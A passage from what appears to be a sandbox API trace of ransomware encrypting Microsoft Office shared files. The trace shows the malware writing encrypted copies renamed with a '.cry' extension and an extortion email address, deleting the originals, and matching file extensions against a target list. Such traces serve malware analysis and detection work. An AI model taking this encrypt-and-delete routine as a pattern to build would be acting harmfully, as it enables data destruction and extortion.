lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0xa7f, lpOverlapped=0x0) returned 1 [0042.643] WriteFile (in: hFile=0x1b8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xa80, lpOverlapped=0x0) returned 1 [0042.644] ReadFile (in: hFile=0x190, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0042.644] WriteFile (in: hFile=0x1b8, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xe8, lpOverlapped=0x0) returned 1 [0042.644] SetEndOfFile (hFile=0x1b8) returned 1 [0042.644] CloseHandle (hObject=0x1b8) returned 1 [0042.645] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0042.645] SetEndOfFile (hFile=0x190) returned 1 [0042.645] CloseHandle (hObject=0x190) returned 1 [0042.645] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0042.646] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\lists\\1033\\stocks.xml")) returned 1 [0042.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.646] lstrlenW (lpString=".doc") returned 4 [0042.646] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.646] lstrlenW (lpString=".docx") returned 5 [0042.646] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0042.646] lstrlenW (lpString=".pdf") returned 4 [0042.646] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.646] lstrlenW (lpString=".xls") returned 4 [0042.646] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.646] lstrlenW (lpString=".xlsx") returned 5 [0042.646] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0042.646] lstrlenW (lpString=".ppt") returned 4 [0042.646] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.646] lstrlenW (lpString=".zip") returned 4 [0042.646] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.646] lstrlenW (lpString=".rar") returned 4 [0042.646] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.646] lstrlenW (lpString=".bz2") returned 4 [0042.646] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.646] lstrlenW (lpString=".7z") returned 3 [0042.646] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.647] lstrlenW (lpString=".dbf") returned 4 [0042.647] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.647] lstrlenW (lpString=".1cd") returned 4 [0042.647] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.647] lstrlenW (lpString=".jpg") returned 4 [0042.647] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.647] lstrlenW (lpString=".doc") returned 4 [0042.647] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString=".docx") returned 5 [0042.647] lstrcmpiW (lpString1=".docx", lpString2="S.XML") returned -1 [0042.647] lstrlenW (lpString=".pdf") returned 4 [0042.647] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString=".xls") returned 4 [0042.647] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString=".xlsx") returned 5 [0042.647] lstrcmpiW (lpString1=".xlsx", lpString2="S.XML") returned -1 [0042.647] lstrlenW (lpString=".ppt") returned 4 [0042.647] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.647] lstrlenW (lpString=".zip") returned 4 [0042.647] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0042.647] lstrlenW (lpString=".rar") returned 4 [0042.647] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString=".bz2") returned 4 [0042.647] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString=".7z") returned 3 [0042.647] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0042.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.647] lstrlenW (lpString=".dbf") returned 4 [0042.647] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.647] lstrlenW (lpString=".1cd") returned 4 [0042.647] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0042.647] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\LISTS\\1033\\STOCKS.XML") returned 78 [0042.648] lstrlenW (lpString=".jpg") returned 4 [0042.648] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0042.648] lstrcmpiW (lpString1=".htm", lpString2=".cry") returned 1 [0042.648] lstrlenW (lpString="Bears.htm") returned 9 [0042.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0043.661] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=255) returned 1 [0043.661] CloseHandle (hObject=0x190) returned 1 [0043.667] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0x20 [0043.667] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.667] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0043.667] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.667] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.667] lstrlenW (lpString=".doc") returned 4 [0043.667] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0043.667] lstrlenW (lpString=".docx") returned 5 [0043.667] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0043.667] lstrlenW (lpString=".pdf") returned 4 [0043.667] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0043.667] lstrlenW (lpString=".xls") returned 4 [0043.667] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0043.667] lstrlenW (lpString=".xlsx") returned 5 [0043.667] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0043.667] lstrlenW (lpString=".ppt") returned 4 [0043.667] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0043.667] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.667] lstrlenW (lpString=".zip") returned 4 [0043.668] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0043.668] lstrlenW (lpString=".rar") returned 4 [0043.668] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0043.668] lstrlenW (lpString=".bz2") returned 4 [0043.668] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0043.668] lstrlenW (lpString=".7z") returned 3 [0043.668] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0043.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.668] lstrlenW (lpString=".dbf") returned 4 [0043.668] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0043.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.668] lstrlenW (lpString=".1cd") returned 4 [0043.668] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0043.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.668] lstrlenW (lpString=".jpg") returned 4 [0043.668] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0043.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.668] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.668] lstrlenW (lpString=".doc") returned 4 [0043.668] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1 [0043.668] lstrlenW (lpString=".docx") returned 5 [0043.668] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1 [0043.668] lstrlenW (lpString=".pdf") returned 4 [0043.668] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1 [0043.671] lstrlenW (lpString=".xls") returned 4 [0043.671] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1 [0043.671] lstrlenW (lpString=".xlsx") returned 5 [0043.671] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1 [0043.671] lstrlenW (lpString=".ppt") returned 4 [0043.671] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1 [0043.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.671] lstrlenW (lpString=".zip") returned 4 [0043.671] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1 [0043.671] lstrlenW (lpString=".rar") returned 4 [0043.671] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1 [0043.671] lstrlenW (lpString=".bz2") returned 4 [0043.671] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1 [0043.671] lstrlenW (lpString=".7z") returned 3 [0043.671] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1 [0043.671] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.671] lstrlenW (lpString=".dbf") returned 4 [0043.671] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1 [0043.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.672] lstrlenW (lpString=".1cd") returned 4 [0043.672] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1 [0043.672] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Bears.htm") returned 67 [0043.672] lstrlenW (lpString=".jpg") returned 4 [0043.672] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1 [0043.672] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0043.672] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.905] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=25234) returned 1 [0043.905] CloseHandle (hObject=0x1b8) returned 1 [0043.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 0x20 [0043.906] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.906] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.906] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.906] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0043.906] GetLastError () returned 0x0 [0043.906] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x6292, lpOverlapped=0x0) returned 1 [0043.912] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x62a0, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x62a0, lpOverlapped=0x0) returned 1 [0043.913] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.913] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.913] SetEndOfFile (hFile=0x1bc) returned 1 [0043.914] CloseHandle (hObject=0x1bc) returned 1 [0043.914] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.914] SetEndOfFile (hFile=0x1b8) returned 1 [0043.914] CloseHandle (hObject=0x1b8) returned 1 [0043.915] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0043.915] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 1 [0043.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.915] lstrlenW (lpString=".doc") returned 4 [0043.915] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.915] lstrlenW (lpString=".docx") returned 5 [0043.915] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.915] lstrlenW (lpString=".pdf") returned 4 [0043.915] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.915] lstrlenW (lpString=".xls") returned 4 [0043.915] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.915] lstrlenW (lpString=".xlsx") returned 5 [0043.915] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.915] lstrlenW (lpString=".ppt") returned 4 [0043.915] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.915] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.915] lstrlenW (lpString=".zip") returned 4 [0043.915] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.915] lstrlenW (lpString=".rar") returned 4 [0043.915] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.915] lstrlenW (lpString=".bz2") returned 4 [0043.915] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.916] lstrlenW (lpString=".7z") returned 3 [0043.916] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.916] lstrlenW (lpString=".dbf") returned 4 [0043.916] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.916] lstrlenW (lpString=".1cd") returned 4 [0043.916] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.916] lstrlenW (lpString=".jpg") returned 4 [0043.916] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.916] lstrlenW (lpString=".doc") returned 4 [0043.916] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.916] lstrlenW (lpString=".docx") returned 5 [0043.916] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.916] lstrlenW (lpString=".pdf") returned 4 [0043.916] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.916] lstrlenW (lpString=".xls") returned 4 [0043.916] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.916] lstrlenW (lpString=".xlsx") returned 5 [0043.916] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.916] lstrlenW (lpString=".ppt") returned 4 [0043.916] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.916] lstrlenW (lpString=".zip") returned 4 [0043.916] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.916] lstrlenW (lpString=".rar") returned 4 [0043.916] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.916] lstrlenW (lpString=".bz2") returned 4 [0043.916] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.916] lstrlenW (lpString=".7z") returned 3 [0043.916] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.916] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.916] lstrlenW (lpString=".dbf") returned 4 [0043.916] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.917] lstrlenW (lpString=".1cd") returned 4 [0043.917] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.917] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0043.917] lstrlenW (lpString=".jpg") returned 4 [0043.917] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.917] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0043.917] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.917] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x315ff1c | out: lpFileSize=0x315ff1c*=34916) returned 1 [0043.917] CloseHandle (hObject=0x1b8) returned 1 [0043.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 0x20 [0043.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0043.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0043.917] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.917] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.918] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0043.918] GetLastError () returned 0x0 [0043.918] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x8864, lpOverlapped=0x0) returned 1 [0043.920] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0x8870, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0x8870, lpOverlapped=0x0) returned 1 [0043.921] ReadFile (in: hFile=0x1b8, lpBuffer=0x3c80020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x315fed4, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesRead=0x315fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.921] WriteFile (in: hFile=0x1bc, lpBuffer=0x3c80020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x315fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3c80020*, lpNumberOfBytesWritten=0x315fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.921] SetEndOfFile (hFile=0x1bc) returned 1 [0043.921] CloseHandle (hObject=0x1bc) returned 1 [0043.921] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x315fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.921] SetEndOfFile (hFile=0x1b8) returned 1 [0043.922] CloseHandle (hObject=0x1b8) returned 1 [0043.923] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0043.923] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\axis\\thmbnail.png")) returned 1 [0043.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.923] lstrlenW (lpString=".doc") returned 4 [0043.923] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.923] lstrlenW (lpString=".docx") returned 5 [0043.923] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.923] lstrlenW (lpString=".pdf") returned 4 [0043.923] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.923] lstrlenW (lpString=".xls") returned 4 [0043.923] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.923] lstrlenW (lpString=".xlsx") returned 5 [0043.923] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.923] lstrlenW (lpString=".ppt") returned 4 [0043.923] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.923] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AXIS\\THMBNAIL.PNG") returned 73 [0043.923] lstrlenW (lpString=".zip") returned 4 [0043.923] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.923] lstrlenW 